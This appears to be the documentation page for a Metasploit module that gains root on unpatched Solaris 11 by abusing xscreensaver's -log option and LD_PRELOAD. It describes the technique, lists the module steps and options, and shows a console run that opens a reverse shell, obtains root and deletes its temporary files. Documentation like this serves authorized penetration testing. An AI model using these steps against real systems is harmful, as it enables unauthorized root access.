## Description

  This module exploits a vulnerability in `xscreensaver` versions
  since 5.06 on unpatched Solaris 11 systems which allows users
  to gain root privileges.

  `xscreensaver` allows users to create a user-owned file at any
  location on the filesystem using the `-log` command line argument
  introduced in version 5.06.

  This module uses `xscreensaver` to create a log file in `/usr/lib/secure/`,
  overwrites the log file with a shared object, and executes the shared
  object using the `LD_PRELOAD` environment variable.


## Vulnerable Application

  This module has been tested successfully on:

  * xscreensaver version 5.15 on Solaris 11.1 (x86)
  * xscreensaver version 5.15 on Solaris 11.3 (x86)


## Verification Steps

  1. Start `msfconsole`
  2. Get a session
  3. Do: `use exploit/solaris/local/xscreensaver_log_priv_esc`
  4. Do: `set SESSION [SESSION]`
  5. Do: `run`
  6. You should get a new *root* session


## Options

  **XSCREENSAVER_PATH**

  Path to `xscreensaver` executable. (default: `/usr/bin/xscreensaver`)

  **XORG_PATH**

  Path to `Xorg` executable. (default: `/usr/bin/Xorg`)


## Scenarios

### Solaris 11.3 (x86)

  ```
  msf > use exploit/solaris/local/xscreensaver_log_priv_esc 
  msf exploit(solaris/local/xscreensaver_log_priv_esc) > set session 1
  session => 1
  msf exploit(solaris/local/xscreensaver_log_priv_esc) > set lhost 172.16.191.165
  lhost => 172.16.191.165
  msf exploit(solaris/local/xscreensaver_log_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [*] Starting Xorg on display :1 ...
  [*] Creating log file /usr/lib/secure/QKaG911RA8.so ...
  [*] Writing '/tmp/.cqihxHb/.fjgQFF7F08.c' (248 bytes) ...
  [*] Writing '/tmp/.cqihxHb/.K94KoDObn' (61 bytes) ...
  [*] Executing payload...
  [*] Command shell session 2 opened (172.16.191.165:4444 -> 172.16.191.221:39510) at 2019-10-21 03:58:47 -0400
  [!] Tried to delete /usr/lib/secure/QKaG911RA8.so, unknown result
  [+] Deleted /tmp/.cqihxHb/.fjgQFF7F08.c
  [+] Deleted /tmp/.cqihxHb/.fjgQFF7F08
  [+] Deleted /tmp/.cqihxHb/.K94KoDObn
  [+] Deleted /tmp/.cqihxHb

  id
  uid=0(root) gid=0(root) groups=10(staff)
  uname -a
  SunOS solaris 5.11 11.3 i86pc i386 i86pc
  cat /etc/release
                               Oracle Solaris 11.3 X86
    Copyright (c) 1983, 2015, Oracle and/or its affiliates.  All rights reserved.
                              Assembled 06 October 2015
  ```

